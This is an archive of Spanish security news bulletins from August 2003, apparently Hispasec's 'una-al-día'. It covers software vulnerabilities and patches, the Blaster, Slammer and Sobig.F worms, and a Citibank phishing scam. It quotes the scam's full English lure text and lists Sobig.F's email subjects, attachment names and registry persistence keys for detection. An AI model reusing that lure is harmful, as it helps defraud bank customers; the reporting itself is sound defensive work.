domingo, 31 de agosto de 2003

Vulnerabilidad en pam_smb

Recientemente se ha identificado una vulnerabilidad in pam_smb por la
que un atacante podría conseguir comprometer la integridad del sistema.

pam_smb es un módulo de autenticación (PAM) empleado en sistemas Linux
para identificar y autorizar a usuarios frente a un servidor externo
SMB (Server Message Block).

pam_smb se ve afectado por una vulnerabilidad por la que un atacante
podría conseguir un desbordamiento de búfer debido al problema que
posee este módulo con el manejo de las contraseñas. En caso de explotar
exitosamente esta vulnerabilidad el intruso podrá lograr la ejecución
de código en el sistema afectado.

Las versiones afectadas por esta vulnerabilidad son la 1.1.6 y
anteriores, por lo que recomendamos la actualización a la versión 1.1.7,
que puede ser descargada desde la dirección:
http://us1.samba.org/samba/ftp/pam_smb/


Antonio Román
roman@hispasec.com


Más información:

Updated pam_smb packages fix remote buffer overflow.
http://rhn.redhat.com/errata/RHSA-2003-262.html

sábado, 30 de agosto de 2003

Vulnerabilidad en Novell Netware

Recientemente se ha identificado una vulnerabilidad en Novell Netware
6.5 por la que un atacante remoto podría causar un ataque de denegación
de servicio (DoS).

El problema está relacionado con un error en XNFS.NLM, que es el demonio
del servidor NFS en Netware 6.5, por el que un atacante podría ocasionar
una denegación de servicios con tan sólo realizar un escáner de puertos
con Nessus.

Este problema surge a los pocos días de la presentación de este producto
que se realizó el pasado día 15 de agosto. NetWare 6.5 forma parte de
Novell Nterprise e incluye capacidades de fuente abierta, de
aplicaciones para servicios Web y de oficina virtual.

Para solucionar este problema se recomienda que apliquen la versión
actualizada que la podrán conseguir en la dirección.

http://support.novell.com/servlet/filedownload/sec/ftf/xnfs1.exe


Antonio Román
roman@hispasec.com


Más información:

XNFS - NESSUS abend fix - TID2966741
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2966741.htm#

Netware llega a su versión 6.5
http://www.vnunet.es/Actualidad/Noticias/Infraestructuras/Soluciones/20030725012

viernes, 29 de agosto de 2003

Vulnerabilidad en Sendmail

Recientemente se ha conocido una vulnerabilidad que afecta a Sendmail
por la que un atacante remoto podría llegar a provocar una denegación de
servicio (DoS) en un sistema vulnerable o incluso llegar a
comprometerlo.

Sendmail es el MTA (Mail Transfer Agent) más veterano y popular en
Internet, con una cuota de bastante más del 50% de los servidores de
correo.

La vulnerabilidad está provocada por el uso de una estructura no
inicializada cuando se usan mapas DNS. Esto puede explotarse mediante
el envío de una respuesta DNS especialmente creada a un sistema
afectado, lo que podrá provocar la caída de este o incluso llegar a la
ejecución de código arbitrario.

Esta vulnerabilidad afecta a las versiones de Sendmail 8.12.8 y
anteriores hasta la 8.12.x , ya que las versiones anteriores a la 8.12
utilizaban otro tipo de mapa DNS.

El usuario que se vea afectado por este problema podrá actualizarse a la
versión 8.12.9 o bajarse el parche que corrige el problema. Los sitios
de descarga son los siguientes:

Sendmail 8.12.9:
http://www.sendmail.org/8.12.9.html

Parche:
http://www.sendmail.org/sm_resolve.c.p1


Antonio Román
roman@hispasec.com


Más información:

Sendmail fails to appropriately initialize data structures for DNS maps
http://www.kb.cert.org/vuls/id/993452

DNS map problem in 8.12.x before 8.12.9
http://www.sendmail.org/dnsmap1.html

DNS map problem in 8.12.x before 8.12.9
http://www.sendmail.org/dnsmap1.html

Parche para FreeBSD
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:11.sendmail.asc

Parche para Mandrake Linux
http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:086

Parche para Red Hat Linux
https://rhn.redhat.com/errata/RHSA-2003-265.html

Sendmail vulnerable to DoS attacks
http://searchenterpriselinux.techtarget.com/originalContent/0,289142,sid39_gci921467,00.html

jueves, 28 de agosto de 2003

El gusano Blaster en entornos corporativos

Los primeros reportes sobre el gusano Blaster apuntaban a que los
principales afectados eran los usuarios domésticos. Con el paso de las
horas y los días se detectó un incremento considerable en los entornos
corporativos, a priori protegidos contra este gusano gracias a sus
medidas de seguridad perimetrales. El origen de muchos de estos
incidentes fueron causa del uso de portátiles y usuarios remotos,
grandes olvidados de las políticas de seguridad.

Las características del gusano Blaster, que se propagaba a través
de una vulnerabilidad del interfaz RPC de Windows, conectándose con
sus víctimas por el puerto TCP/135, lo hacían idóneo para infectar
a usuarios domésticos. Dejando a un lado a los usuarios de ADSL que
suelen contar con la protección adicional del router, o a los más
previsores que cuentan con firewalls personales, la mayoría se
conectan a Internet de forma directa y transparente, permitiendo el
acceso indiscriminado a todos sus puertos.

Por contra, la mayoría de las corporaciones cuentan con sistemas de
protección perimetral, como los firewalls, que impiden el acceso
indiscriminado desde Internet a los sistemas locales, protegen los
puertos no públicos de los servidores hospedados en la DMZ, etc.
Aunque se pueden encontrar deshonrosos casos donde Blaster consiguió
infectar entornos corporativos directamente desde Internet, por
ejemplo a través de servidores públicos con el puerto TCP/135
accesible y con conexiones a recursos de la red local, lo cierto es
que durante las primeras horas de Blaster el impacto en las
corporaciones fue muy limitado.

Sin embargo, a medida que pasaban las horas aumentaban las incidencias
en entornos corporativos, donde a priori no era posible una vía de
comunicación a través del puerto TCP/135 y sus sistemas. Hispasec,
previa demanda de las empresas afectadas, ha actuado en varios de
estos entornos.

En primer lugar se ejecutó un plan de choque para eliminar el gusano
y prevenir futuras infecciones, para lo que tuvimos que desarrollar
una herramienta que desinfectara y parcheara los equipos sin
necesidad de recurrir a las actualizaciones de Microsoft. Este ha
sido uno de los talones de Aquiles de las soluciones gratuitas
facilitadas por los antivirus en este caso, que eliminaban el gusano
pero no actuaban previniendo futuras infecciones, quedando en mano
de los administradores o usuarios la instalación de los parches de
Microsoft si no querían verse de nuevo afectados. La realidad es que
existen formas de hacer ambas funciones, desinfección y prevención,
en un sólo paso y en cuestión de segundos. Es de esperar que a corto
o medio plazo las soluciones antivirus evolucionen y tengan un papel
más activo en este terreno.

Pasada la tormenta, quedaba la auditoría de los sistemas de seguridad
perimetrales para detectar un posible agujero que hubiera permitido la
entrada de Blaster desde Internet. En la mayoría de los casos no
era posible que Blaster hubiera infectado a través de Internet de
forma directa. Una revisión del plan de seguridad corporativo sí
evidenciaba varios agujeros potenciales, en su mayoría relacionados
con el uso de portátiles y los usuarios remotos, que pudieron ser
confirmados con posterioridad.

El caso típico de los portátiles consistía en su uso indiscriminado
por parte del usuario tanto en su domicilio particular, donde se
conectaba con él a Internet, así como en la oficina, donde lo
conecta a la red corporativa. El resultado, el portátil se infecta
mientras lo utiliza en casa conectado a Internet, ya que no cuenta
con los sistemas de protección perimetrales corporativos, e infecta
a la empresa cuando lleva el portátil a la oficina y lo conecta
directamente a la intranet o red local.

Otro caso que nos encontramos fue el de los usuarios móviles o
remotos, que bien por teletrabajo o necesidades puntuales,
conectaban con la intranet a través de redes privadas. La historia
era muy similar a la de los portátiles, los equipos utilizados
se infectaron desde Internet, y Blaster lograba posteriormente
infectar a las corporaciones cuando el usuario accedía a los
recursos internos de forma remota desde el sistema ya infectado.

Además de proporcionar herramientas para este tipo de usuarios,
que permiten controlar la política de seguridad de esos sistemas
de forma centralizada y remota, de manera independiente a donde
estos se encuentren (domicilios particulares, usuarios móviles,
etc), Hispasec pudo corroborar el mal estado en que se encuentra
la seguridad interna de las corporaciones, lo que provocó que el
gusano pudiera campar a sus anchas por la intranet causando
estragos.

Recuerdo que hace unos meses, durante las jornadas de
e-Gallaecia 2003, Jesús Cea y yo dejamos en bastante mal lugar
a los antivirus perimetrales. Uno de los motivos de crítica, de manera
independiente a sus debilidades intrínsecas que ya quedaron patentes
en algunas de las demostraciones que realizamos, es que suelen crear
una falsa sensación de seguridad, que lleva a relajar y descuidar
las políticas de seguridad interna, tanto en el ámbito técnico como
desde el punto de vista de las prácticas de los usuarios. De forma
que al final suele ocurrir que se descuidan los antivirus en las
estaciones de trabajo o que el usuario abra todo lo que le llega
confiando que el antivirus perimetral es infalible.

Nadie puede negar de las ventajas de las soluciones de seguridad
perimetrales, ya sean firewalls, antivirus, IDS, etc., pero hay
que ser conscientes de que no pueden ser excusas para relajar
la seguridad local. La experiencia demuestra día a día que son
muchos los ataques que provienen desde el interior, que las
soluciones perimetrales son en algún momento vulnerables y que
debemos contar con que algún atacante consiga acceso remoto,
o que, como en este caso, amenazas diseñadas para Internet terminan
colándose en nuestras intranets.


Bernardo Quintero
bernardo@hispasec.com


Más información:

11/08/2003 - W32/Blaster, un gusano con una alta incidencia
http://www.hispasec.com/unaaldia/1751

27/07/2003 - Predicen gusano tras la publicación de un exploit
http://www.hispasec.com/unaaldia/1736

31/10/2002 - Comentarios sobre los antivirus perimetrales
http://www.hispasec.com/unaaldia/1467

13/08/2002 - Antivirus corporativo: dos (diferentes) mejor que uno
http://www.hispasec.com/unaaldia/1388

miércoles, 27 de agosto de 2003

Compromiso del sistema por desbordamiento de búfer en MDAC

Se ha anunciado la existencia de un problema de desbordamiento de
búfer en MDAC (Microsoft Data Access Components) por la cual un
atacante puede llegar a comprometer cualquier sistema afectado.
Microsoft ha publicado las actualizaciones necesarias para evitar los
efectos de esta vulnerabilidad.

Microsoft Data Access Components (MDAC) es una colección de
componentes empleados para proporcionar conectividad de bases de datos
en plataformas Windows.

MDAC se encuentra presente en la mayoría de sistemas Windows:
* Por defecto se encuentra incluido como parte de Microsoft Windows
XP,
Windows 2000, Windows Millennium Edition, y Windows Server 2003.
* MDAC está disponible para descarga como tecnología independiente.
* MDAC es instalado o incluido por otra serie de productos o
tecnologías. Por ejemplo, se incluye en Microsoft Windows NT 4.0
Option Pack y en Microsoft SQL Server 2000. Algunos componentes de
MDAC también se incluyen como parte de Microsoft Internet Explorer.

MDAC proporciona la funcionalidad para diversas operaciones de bases
de datos, como conectar a bases de datos remotas o devolver datos a un
cliente. Cuando un sistema cliente en una red intenta visualizar la
lista de ordenadores que ejecutan SQL Server y que se encuentran en la
red, se envía una petición broadcast a todos los dispositivos de la
red. Debido a un error en un componente de MDAC un atacante podrá
responder con un paquete específicamente creado que provoque el
desbordamiento de búfer.

Un atacante que explote exitosamente este fallo podrá conseguir el
mismo grado de privilegios sobre el sistema que el de la aplicación
que inició la petición broadcast. Las acciones que un atacante
puede llevar a cabo dependerán de los permisos de la aplicación que
hace uso de MDAC.

Microsoft proporciona el parche para evitar esta vulnerabilidad, que
está disponible para descarga desde:
http://microsoft.com/downloads/details.aspx?FamilyId=9107ABC6-8995-4A99-B6A0-478B3A847E9C&displaylang=en


Antonio Ropero
antonior@hispasec.com


Más información:

Unchecked Buffer in MDAC Function Could Enable System Compromise
http://www.microsoft.com/technet/security/bulletin/MS03-033.asp

What You Should Know About Microsoft Security Bulletin MS03-033
Security Update for Microsoft Data Access Components (MDAC)
http://www.microsoft.com/security/security_bulletins/ms03-033.asp

martes, 26 de agosto de 2003

Sobreescritura de ficheros arbitrarios con "unzip"

Las versiones de la utilidad "unzip" no actualizadas son susceptibles
a un ataque por medio del cual permiten sobreescribir cualquier
fichero del sistema accesible al usuario que realiza la operación.

"unzip" es una pequeña utilidad que permite descomprimir ficheros ZIP
en casi cualquier plataforma informática, desde Commodore Amiga y
Atari ST, a VMS.

Las versiones de "unzip" anteriores a la 5.50 contienen una
vulnerabilidad que permite que un un usuario inadvertido sobreescriba
cualquier fichero sobre el que tenga acceso (todos, si es el
administrador o "root") cuando intenta descomprimir un fichero ZIP
especialmente preparado por el atacante.

La recomendación es actualizar cuanto antes a la versión 5.50 de
"unzip".

Otras utilidades similares que se vieron afectadas por el mismo
problema:

GNU tar versión <= 1.13.19
RARSoft rar versión <= 2.02
PKWare pkzipc versión <= 4.00


Jesús Cea Avión
jcea@hispasec.com


Más información:

UnZIP
http://www.info-zip.org/pub/infozip/UnZip.html

Directory traversal and path globing in multiple archivers
http://marc.theaimsgroup.com/?l=bugtraq&m=99496364810666&w=2

lunes, 25 de agosto de 2003

Ejecución de código script arbitrario con RealOne

Se ha anunciado una vulnerabilidad en el manejo de archivos SMIL del
reproductor RealOne. Si bien requiere engañar al usuario para que
reproduzca dichos archivos, este problema puede llevar a la ejecución
de código arbitrario en la máquina de la víctima.

RealOne Player es un popular reproductor multimedia de la compañía
Real Networks. Reproduce una gran cantidad de formatos multimedia,
entre los que se encuentran Windows Media, Quicktime MPEG-4 y DVD.
Soporta también el uso de archivos SMIL (Synchronized Multimedia
Integration Language), creados en un lenguaje similar al HTML y que
permite (entre otras cosas) coordinar la reproducción de archivos
multimedia en páginas web, o dar cierto nivel de interactividad a
éstos.

Aunque la compañía no ha dado detalles, el problema se encuentra
precisamente en el manejo de esos archivos SMIL, de tal manera que
creando uno especialmente diseñado y engañando al usuario para que lo
reproduzca, podría ejecutarse código script (JavaScript, VBScript) en
la máquina de la víctima.

Las versiones vulnerables son las siguientes: RealOne Player (en
inglés), RealOne Player v2 para Windows (en todos los idiomas), y
RealOne Enterprise Desktop (todas las versiones). Para solucionar el
problema, se recomienda actualizar desde el propio programa en sí,
utilizando la funcionalidad propia a tal efecto en el menú de
herramientas.

RealNetworks ha advertido que esta actualización de seguridad puede
hacer que algunas presentaciones dejen de funcionar, como las que, por
ejemplo, utilicen código JavaScript como evento incrustado en un
archivo de extensión RM.


Julio Canto
jcanto@hispasec.com


Más información:
http://www.service.real.com/help/faq/security/08182003/Spanish/

domingo, 24 de agosto de 2003

Vulnerabilidad WU-FTPD

Las versiones no actualizadas de WU-FTPD contienen un desbordamiento
de búfer que permite que un atacante remoto ejecute código arbitrario
en el servidor y obtenga privilegios de administrador o "root".

WU-FTPD es un servidor FTP desarrollado en la Universidad de
Washington, EE.UU. Aunque en los últimos años ha ido dejando paso a
proyectos alternativos como el ProFTP, WU-FTPD sigue siendo unos de
los servidores FTP más utilizados del mundo Unix.

El problema radica en la función "fb_realpath()". Dicha función
concatena varios búferes para construir un "path". Aunque se comprueba
que la longitud final no sea excesiva, la comprobación se realiza con
"MAXPATHLEN+1", cuando el tamaño máximo real del búfer es "MAXPATHLEN".

Este desbordamiento permite que un atacante introduzca y ejecute código
malicioso en el servidor. El atacante necesita acceso de escritura al
servidor FTP. El éxito del ataque en sí depende de la versión del
Kernel, librerías, sistema operativo y arquitectura de la CPU concreta
empleada.

La vulnerabilidad afecta a las versiones WU-FTPD entre la 2.5.0 y la
2.6.2, ambas inclusive.

En los Unix OpenSource *BSD, existe un problema de seguridad adicional
en una función de la librería C estándar, llamada "realpath". Se han
publicado ya varios avisos de seguridad al respecto, con
actualizaciones de sus sistemas.


Jesús Cea Avión
jcea@hispasec.com


Más información:

wu-ftpd fb_realpath() off-by-one bug
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt

Off-by-one error in the fb_realpath() function, as derived from the
realpath function in BSD, may allow attackers to execute arbitrary code,
as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause
pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including
(1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or
(8) RNTO.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0466

Vulnerability Note VU#743092: realpath(3) function contains off-by-one
buffer overflow
http://www.kb.cert.org/vuls/id/743092

DSA-357-1 wu-ftpd -- remote root exploit
http://www.debian.org/security/2003/dsa-357

Off-by-one Buffer Overflow Vulnerability in BSD libc realpath(3)
http://marc.theaimsgroup.com/?l=bugtraq&m=106002488209129&w=2

Updated wu-ftpd packages fix remote vulnerability
http://rhn.redhat.com/errata/RHSA-2003-245.html

Updated wu-ftpd packages fix remote vulnerability
http://rhn.redhat.com/errata/RHSA-2003-246.html

MandrakeSoft Security Advisory MDKSA-2003:080 : wu-ftpd
http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:080

SuSE Security Announcement
http://www.suse.de/de/security/2003_032_wuftpd.html

WU-FTPD
http://www.wuftpd.org/

sábado, 23 de agosto de 2003

Nuevo caso de "phishing", esta vez con Citibank

Al igual que otras entidades financieras, Citibank se ve afectado por
un problema que se está convirtiendo en habitual en estos últimos
tiempos: la suplantación del remitente en mensajes de correo
electrónico con el fin de sustraer información de usuarios.

Podemos recordar el caso publicado recientemente en Hispasec con fecha
20 de mayo del presente año en el que se intentaba realizar la misma
acción contra clientes del BBVA. La recomendación que hicimos entonces
sigue vigente para el caso de Citibank.

"Desde Hispasec Sistemas recomendamos a nuestros lectores que siempre
desconfíen de este tipo de peticiones que una compañía jamás haría a
sus clientes. No deben introducir datos (especialmente relativos a
información bancaria y contraseñas) en sitios cuya autoría sea dudosa
o no esté contrastada, así como verificar la existencia de los
correspondientes certificados."

Citibank realizó un comunicado el pasado día 18 del presente mes en
el que informaba a sus usuarios del problema suscitado por el envío
masivo de mensajes suplantando la identidad de la citada entidad
financiera. En estos mensajes fraudulentos se solicita a los
destinatarios que visiten un sitio web que simula ser de Citibank para
introducir sus datos identificativos, con la falsa advertencia de que
si no lo realizasen se les cancelaría la cuenta con dicha entidad.

El cuerpo del mensaje falso decía:

Dear Citibank customer,

We are letting you know, that you, as a Citibank checking account
holder, must become acquainted with our new Terms & Conditions and
agree to it.

Please, carefully read all the parts of our new Terms & Conditions and
post your consent.

Otherwise, we will have to suspend your Citibank checking account.
This measure is to prevent misunderstanding between us and our valued
customers.

We are sorry for any inconvinience it may cause.

Click here to access our Terms & Conditions page and not allow your
Citibank checking account suspension.

En la actualidad la página falseada, albergada en NANHUA FUTURES
TRADING CO. LTD, Zhejiang, China, a la cual tenían que dirigirse los
usuarios de Citibank, no está operativa.

Según fuentes periodísticas norteamericanas, en un primer momento
pudieron detectarse algunas irregularidades gramaticales en el mensaje
falseado que pusieron en alerta a los usuarios afectados.



Antonio Román
roman@hispasec.com


Más información:

Citibank warns customers on "phishing" email scam
http://www.geek.com/news/geeknews/2003Aug/gee20030821021374.htm

Citibank alerta a clientes sobre operación fraudulenta 'online'
http://es.news.yahoo.com/030819/44/2wlu3.html

Citibank Statement on Email Scam
http://www.citibank.com/domain/email_scam.htm

Citibank is sending out checking account suspension notices and asking
customers to verify their acceptance of new terms and conditions.
http://www.snopes.com/inboxer/scams/citibank.asp

Citibank Warns of Phishing Email Scam
http://www.klas-tv.com/Global/story.asp?S=1406757&nav=168XHWW3

E-mail fraudsters attack Citibank
http://news.bbc.co.uk/1/hi/business/3162099.stm

Intento de fraude a los clientes del BBVA
http://www.hispasec.com/unaaldia/1668

viernes, 22 de agosto de 2003

Internet Explorer: actualización urgente

Nuevas vulnerabilidades descubiertas en el navegador de Microsoft
requieren instalar de forma urgente el último parche acumulativo.
Entre otros problemas, los agujeros de seguridad permitirían ejecutar
comandos arbitrarios de forma remota al visitar una página web con
Internet Explorer, lo que compromete totalmente los sistemas de los
usuarios que utilicen dicho navegador.

Todas las versiones de Internet Explorer están afectadas (5.01, 5.5,
6.0 y 6.0 para Windows 2003). Los parches pueden ser instalados de
forma automática desde http://windowsupdate.microsoft.com o bien
descargarse directamente, según versión e idioma, desde:
http://www.microsoft.com/windows/ie/downloads/critical/822925/default.asp

Con la excepción de aquellos que dispongan de Internet Explorer 6 para
Windows 2003 Server, cuyo parche se encuentra en esta localización:
http://www.microsoft.com/windows/ie/downloads/critical/822925s/default.asp

Las vulnerabilidades corregidas son:

* Posibilidad de ejecutar scripts de forma remota en el contexto de
seguridad de la zona local, por defecto con menos restricciones de
seguridad que la zona Internet. Entre otras acciones, el atacante
podría ejecutar comandos locales o visualizar todo el contenido
del sistema del usuario (información sensible, contraseñas, etc).

* Ejecución arbitraria de comandos de forma remota, sin duda la
vulnerabilidad más crítica. El atacante podría llevar a cabo
prácticamente cualquier acción, con los mismos privilegios que el
usuario. Aquí el problema es que es posible hacer creer a Internet
Explorer que cualquier ejecutable es seguro y lanzarlo de forma
automática sin pedir autorización alguna al usuario.

La forma de explotación es sencilla, todo se debe a que Internet
Explorer no chequea realmente la naturaleza del contenido que
establece la localización del ActiveX a descargar en la etiqueta
Object. Todos los detalles en el aviso de eEye en el apartado de
"Más información".

* Por último han aprovechado este parche para incluir una
modificación en el registro de Windows (KillBit) que impide que
el control ActiveX BR549.DLL pueda ser ejecutado en Internet
Explorer, ya que se han descubierto vulnerabilidades en él.
Este control formaba parte de Windows Reporting Tool, y con
esta modificación se impide también que pueda ser reintroducido
en el sistema desde una página web maliciosa para aprovechar
sus vulnerabilidades, ya que originalmente estaba marcado como
seguro y su instalación era transparente al usuario.

Adicionalmente se han añadido otras modificaciones, relacionadas
con vulnerabilidades consideradas menores y, como parche acumulativo
que es, incluye correcciones anteriores.

Desde Hispasec hacemos hincapié en la importancia de este parche,
por lo que instamos a todos los usuarios afectados a que procedan
a la instalación del mismo de forma inmediata.


Bernardo Quintero
bernardo@hispasec.com



Más información:

Cumulative Patch for Internet Explorer (822925)
http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

Internet Explorer Object Data Remote Execution Vulnerability
http://www.eeye.com/html/Research/Advisories/AD20030820.html

jueves, 21 de agosto de 2003

SQL/Slammer deja KO los sistemas informáticos de una central nuclear

Como recordarán los lectores habituales de "una-al-día", el pasado mes
de enero apareció uno de los gusanos con mayor incidencia de los
últimos tiempos: SQL/Slammer. Pasados más de seis meses todavía se van
conociendo nuevos efectos que produjo, como poner en jaque los
sistemas de monitorización de una central nuclear de los Estados
Unidos.

SQL/Slammer fue un gusano que apareció a finales de enero del presente
año. Aprovechándose de una vulnerabilidad bastante antigua de
Microsoft SQL Server, consiguió afectar seriamente el funcionamiento
global de la red Internet. No sólo por afectar directamente a una
gran cantidad de servicios que utilizaban versiones vulnerables del
software (ya sea por la ausencia del parche o por haber instalado un
parche posterior que eliminaba el parche específico de la
vulnerabilidad), sino por que la gran cantidad de tráfico que generó
afectó negativamente a una gran cantidad de redes de todo el planeta.

Ese gusano destacó especialmente por su vorágine y velocidad de
propagación. Por ejemplo, podemos recordar que cada 8,5 segundos el
gusano conseguía doblar el número de sistemas infectados y que en sólo
diez minutos consiguió introducirse e infectar 75.000 ordenadores.

Hoy, a través de SecurityFocus, hemos tenido conocimiento de un hecho
que sucedió durante ese fin de semana de enero en el apogeo de
SQL/Slammer: infectar la red de monitorización de una central nuclear,
dejándola inoperativa durante cinco largas horas.

El incidente, según se revela en un informe de la empresa que gestiona
esa central nuclear enviado a la comisión de regulación nuclear,
sucedió más o menos de la siguiente forma:

El gusano SQL/Slammer empezó a introducirse a través del enlace
existente entre la central nuclear y una empresa subcontratada que
realizaba trabajos para la misma. Esta conexión ignoraba los
mecanismos de protección perimetral existentes para la separación de
la red informática de la central nuclear e Internet. Esta fue la
entrada del gusano.

Una vez dentro dentro de la red de producción de la planta nuclear,
infectó un sistema SQL Server vulnerable. Debido a la gran cantidad de
tráfico que llegó a generar este sistema vulnerable, la consola de
monitorización SPDS de la planta nuclear quedó colgada.

Entre las funciones que realiza la consola SPDS se encuentra la
monitorización de los sistemas de refrigeración, los sensores de
temperatura del reactor y los medidores de radiación. Se trata de
elementos críticos para la seguridad de la central, que deben ser
vigilados de forma permanente.

En total, estos sistemas de monitorización estuvieron casi cinco horas
inoperativos, Cinco horas durante los cuales los responsables de la
central nuclear no podían controlar las constantes de funcionamiento
de la central. Si se hubiera producido cualquier situación excepcional
durante ese periodo de tiempo, no hubiera sido posible su rápida
detección.


Xavier Caballé
xavi@hispasec.com


Más información:

Slammer worm crashed Ohio nuke plant network
http://www.securityfocus.com/news/6767

SQL Slammer Worm Lessons Learned for Consideration by the Electricity Sector
http://www.esisac.com/publicdocs/SQL_Slammer_2003.pdf

una-al-día (26-01-2003) - Alerta: Gusano para MS-SQL
http://www.hispasec.com/unaaldia/1554

una-al-día (27-01-2003) - Lecciones del gusano MS-SQL
http://www.hispasec.com/unaaldia/1555

The Spread of the Sapphiere/Slammer Worm
http://www.caida.org/analysis/security/sapphire/

miércoles, 20 de agosto de 2003

Múltiples vulnerabilidades en clientes eMule/xMule/Lmule

Descubiertas importantes vulnerabilidades en eMule, xMule y Lmule, que
potencialmente permiten a un atacante comprotemer de forma remota los
equipos que ejecuten las versiones afectadas. Hispasec recomienda a
todos los usuarios que actualicen a la última versión disponible de
forma inmediata.

Los clientes nombrados son unas de las herramientas más utilizadas
entre los usuarios de las famosas redes de intercambio de archivos
p2p, que en este caso funcionan bajo redes edonkey2000. EMule corre
bajo plataformas Windows, mientras que xMule y Lmule lo hacen sobre
Unix.

La gran cantidad de usuarios de estas redes (millones), y el hecho de
que la mayoría no suelen estar al tanto de actualizaciones ni avisos
de seguridad, los convierten en un objetivo apetecible para los
crackers y script-kiddies. En último caso pueden dar la oportunidad a
asociaciones como la RIAA (la Asociación Estadounidense de la
Industria de la Grabación), u otras que nos tocan más cerca, de
ejercer aun más presión.

Dada la gravedad de las vulnerabilidades, Hispasec solicita se de la
máxima difusión a esta nota entre los foros más concurridos por los
usuarios de estos programas.

Las versiones afectadas son:

eMule <= 0.29c
Lmule <= 1.3.1
xMule <= 1.4.3, <= 1.5.6a (corregidas parcialmente)

Los usuarios de eMule ya disponen de la última versión 0.30a que
corrige todas las vulnerabilidades. Los usuarios de Lmule deben
cambiar a xMule debido a que los desarrolladores han abandonado el
proyecto en favor de este último. En el caso de xMule las últimas
versiones disponibles han corregido dos de las cuatro
vulnerabilidades, y se espera que en breve se libere una nueva
versión que haga lo propio con el resto.

Entrando con más detalle en las vulnerabilidades, la primera afecta a
la función que recoge los mensajes del servidor (OP_SERVERMESSAGE).
Un servidor podría actuar de forma maliciosa formateando de forma
especial dichos mensajes para provocar el bloqueo del cliente o
conseguir el control total del sistema afectado.

La siguiente también puede ser provocada desde un servidor malévolo,
en esta ocasión explotando un heap overflow en la función que recoge
la identificación del servidor (OP_SERVERIDENT), con las mismas
implicaciones de seguridad que las comentadas anteriormente.

La tercera de las vulnerabilidades, muy similar a la primera, se
basa en alterar el formato de los mensajes que se utilizan para dar
los nombres de los nuevos servidores que deben de agregarse a la
lista de servidores. Sin embargo en esta ocasión es mucho más
complicado que pueda lograrse con éxito la ejecución de código
arbitrario y tomar el control del sistema afectado, por las
limitaciones de tamaño impuestas a la variable.

Sobre la última vulnerabilidad no han ofrecido muchos detalles, pero
concierne al envío de una secuencia de paquetes perfectamente
normales que pueden producir una condición de error cuando su objeto
es eliminado.


Francisco Javier Santos
fsantos@hispasec.com


Más información:

emule/xmule/lmule remote vulnerabilities
http://security.e-matters.de/advisories/022003.html

eMule Project
http://www.emule-project.net/

xMule P2P Client
http://www.xmule.org/

Lmule Homepage
http://lmule.sourceforge.net/news.php

martes, 19 de agosto de 2003

Alerta: gusano Sobig.F se propaga masivamente

En las últimas horas Hispasec ha detectado una gran incidencia de
esta nueva versión del gusano Sobig. Se propaga de forma tradicional,
enviándose como adjunto en un e-mail, y a través de los recursos
compartidos de las redes locales.

En su llegada por e-mail lo podemos identificar de forma fácil al
utilizar algunos de los siguientes campos fijos en la construcción
del mensaje.

Asunto:

Re: That movie
Re: Wicked screensaver
Re: Your application
Re: Approved
Re: Re: My details
Re: Details
Your details
Thank you!
Re: Thank you!

Nombre del archivo adjunto:

movie0045.pif
wicked_scr.scr
application.pif
document_9446.pif
details.pif
your_details.pif
thank_you.pif
document_all.pif
your_document.pif


Cuerpo del mensaje:

See the attached file for details
Please see the attached file for details.


Cuando se ejecuta en un sistema, crea los archivos winppr32.exe y
winsst32.dat en la carpeta de Windows, e introduce dos entradas en
el registro para asegurarse su ejecución cada vez que se inicie el
sistema:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
TrayX = %WindowsDir%\winppr32.exe/sinc

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
TrayX = %WindowsDir%\winppr32.exe/sinc

Además intenta copiarse en todos los recursos compartidos que
encuentra a su alcance para intentar propagarse entre otros equipos
de la red local.

Para propagarse a través del correo electrónico utiliza su propio
motor SMTP y recolecta las direcciones de e-mail a las que enviarse
de los archivos con extensión DBX, HLP, MHT, WAB, EML, TXT, HTM y
HTML que encuentra en el sistema infectado.

Sobig.F incorpora un mecanismo que le permite descargar y ejecutar
archivos en los equipos infectados, lo que facilita al autor la
instalación de troyanos para conseguir acceder a los sistemas,
utilizar los equipos infectados como servidores de correo, o
actualizar el propio gusano.

Su código contiene una lista de servidores maestros a los que el
gusano se conecta a través del puerto UDP/8998 para recoger la
URL donde iniciar la descarga del archivo a instalar. Estas
conexiones con el servidor maestro las realiza los sábados y
domingos entre las 7 y 10 P.M., según el horario UTC (Universal Time
Coordinated). Para conocer la hora UTC, de manera independiente a
la hora local del sistema infectado, se sincroniza conectando con
algunos servidores con servicio NTP a través del puerto UDP/123.

Por último hay que destacar que el gusano viene con fecha de
caducidad, ya que se autodesactiva el 10 de septiembre de 2003.

Para su prevención desde Hispasec recomendamos, como regla básica
general, no abrir o ejecutar archivos no solicitados, y actualizar
puntualmente las soluciones antivirus. En el caso de infección, el
gusano puede ser eliminado borrando las entradas del registro y
archivos que se mencionan en la descripción, o utilizando algunas
de las herramientas gratuitas que las principales casas antivirus
han puesto a disposición de los usuarios de forma gratuita.


Bernardo Quintero
bernardo@hispasec.com


Más información:

Win32.Sobig.F@mm
http://www.bitdefender.com/bd/site/virusinfo.php?menu_id=1&v_id=152

Win32.Sobig.F
http://www3.ca.com/solutions/collateral.asp?CT=27081&CID=49259

W32/Sobig.F@mm
http://www.f-prot.com/news/vir_alert/sobig_f.html

Sobig.F
http://www.f-secure.com/v-descs/sobig_f.shtml

Win32/Sobig.F
http://www.enciclopediavirus.com/virus/vervirus.php?id=515&alerta=1

W32/Sobig.F@MM
http://www.hacksoft.com.pe/virus/w32_sobig_f.htm

I-Worm.Win32.Sobig.F
http://www.globalhauri.com/html/support/virus_read.html?code=IWW3000430

Beware! Yet Another Version of Sobig Is On The Loose
http://www.kaspersky.com/news.html?id=986203

W32/Sobig.F@mm
http://www.norman.com/virus_info/w32_sobig_f_mm.shtml

W32/Sobig.f@MM
http://vil.nai.com/vil/content/v_100561.htm

